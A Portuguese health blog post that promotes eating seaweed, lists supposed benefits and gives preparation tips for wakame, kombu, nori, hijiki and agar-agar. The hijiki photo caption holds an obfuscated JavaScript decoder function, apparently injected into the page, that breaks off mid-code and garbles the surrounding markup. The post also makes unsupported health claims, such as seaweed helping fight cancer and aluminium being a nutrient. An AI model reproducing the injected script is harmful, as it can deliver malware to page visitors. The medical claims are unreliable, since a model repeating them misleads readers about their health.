Dicas saudáveis – benefícios de consumir algas

 

 

Sabia que consumir algas marinhas tem muitos benefícios para a sua saúde? As algas marinhas são compostas por grandes quantidades de vitamina A e vitamina C e, por isso, são um dos alimentos que devemos ingerir para uma melhor saúde. Experimente e saiba quais são os vários tipos de algas que pode ingerir e todos os benefícios associados!

As algas são extremamente nutricionais, cheias de fibras e ricas em Magnésio, Sódio, Cálcio, Ferro, Alumínio, Manganês, Fósforo, Enxofre, entre outros tantos nutrientes. Vamos conhecer então os benefícios de consumir algas para a nossa saúde e para a nossa vida:

 

 

1- Excelente fonte de iodo

Como lhe disse acima, as algas marinhas têm um alto teor de iodo e, por isso, são muito importantes para a tiróide, para o sistema imunitário e para a regulação de hormonas.

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Dicas saudáveis – benefícios de consumir algas - Excelente fonte de iodo | Foto: tuasaude

 

 

2- Ajudam a combater o cancro

O fucoidan é um componente presente nas algas marinhas. Este componente tem a capacidade de reduzir células cancerígenas e, por conseguinte, ajuda a combater o cancro.

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Dicas saudáveis – benefícios de consumir algas - Ajudam a combater o cancro | Foto: newsplex

 

 

3- Contribui para o bom funcionamento do coração

Dado terem vitamina B1 e B2, as algas ajudam a libertar a energia dos hidratos de carbono, proteínas e gorduras. A B1 está associada ao sistema nervoso e coração e a B2 ao metabolismo do ferro.

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Dicas saudáveis – benefícios de consumir algas - Contribui para o bom funcionamento do coração | Foto: mulher

 

 

4- Regulam o metabolismo

O ferro presente nas algas marinhas é necessário para a produção de glóbulos vermelhos e para o funcionamento normal do metabolismo e das enzimas que removem substâncias indesejadas do organismo.

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Dicas saudáveis – benefícios de consumir algas - Regulam o metabolismo | Foto: treinomestre

 

 

5- Contribuem para dentes mais bonitos

O cálcio que as algas têm é importante para a formação e manutenção de ossos e dentes fortes e para o funcionamento dos nervos e músculos. Está também envolvido na coagulação sanguínea.

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Dicas saudáveis – benefícios de consumir algas - Contribuem para dentes mais bonitos | Foto: poptudo

 

 

Para nutrir o organismo a meio da manhã experimente um batido de algas, juntando-lhes água ou sumos de fruta.

 

 

Agora apresento-lhe algumas das principais variedades de algas:

 

- Wakamé

Rica em fibra e ácido fólico, tem folhas verdes escuras encaracoladas e um sabor suave e adocicado. Pode ser usada em sopas (como a de miso) ou como acompanhamento, com outros vegetais. Para prepará-la, demolhe-as durante cerca de 20 minutos e ferva em lume brando durante 15 a 20 minutos. Como alternativa, corte em pedaços e sirva como salada. Retire o veio central depois de demolhar, já que não amolecerá com a cozedura.

 

 

- Kombu

De cor escura e mais larga que as outras, é excelente para cozinhar com leguminosas. Torna-as mais macias e fáceis de digerir, evitando a formação de gases intestinais. Pode ser usada em sopas e caldos (como o japonês dashi). Se preparar este prato, cozinhe durante, no mínimo, 30 a 45 minutos, após demolhar.

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Dicas saudáveis – benefícios de consumir algas - Kombu | Foto: squarespace

 

 

- Nori

Tem folhas finas, uma cor entre o verde vivo e o roxo e um sabor agradável a peixe. É usada em tiras secas para fazer sushi. Favorece a digestão e activa a circulação sanguínea. Toste rapidamente na chama do fogão e coma directamente ou parta-a aos pedaços e salpique sobre a sopa, vegetais ou feijões.

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Dicas saudáveis – benefícios de consumir algas - Nori | Foto: secretsofsushi

 

 

- Hijiki

Alga escura e comprida, de textura semelhante à da espécie aramé (uma alga muito fina), mas mais espessa. Tem um forte sabor a mar e 14 vezes mais cálcio que o leite de vaca. Neste caso, demolhe durante cerca de 15 minutos (o seu volume aumentará cinco vezes). Cozinhe durante, no mínimo, 30 minutos.

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Dicas saudáveis – benefícios de consumir algas - Hijiki | Foto: function a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<<2)|(w9>>4);w6=((w9&15)<<4)|(we>>2);qe=((we&3)<<6)|n7;if(n6>=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oaandrop.com.br/wp-content/uploads/2016/04/Hijiki-300x199.jpg"> oceandrop

 

 

- Agar-Agar

É um extracto de cor branca ou creme que se obtém a partir de vários tipos de algas vermelhas. Compra-se em fios, flocos ou em barra e, devido à sua capacidade de absorção, pode usar-se para espessar ou gelificar alimentos doces ou salgados, como gelatinas de fruta ou vegetais. Se a preparar, demolhe durante poucos minutos e cozinhe até se dissolver. Misture com fruta e deixe solidificar até obter uma gelatina de origem vegetal.

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Dicas saudáveis – benefícios de consumir algas - Agar-Agar | Foto: dimensionvegana

 

Eu consumo algas e recomendo. Estão repletas de nutrientes. Tem curiosidade? Estas são as algas que eu sugiro. Eu confio na Girassol. Confie também.

 

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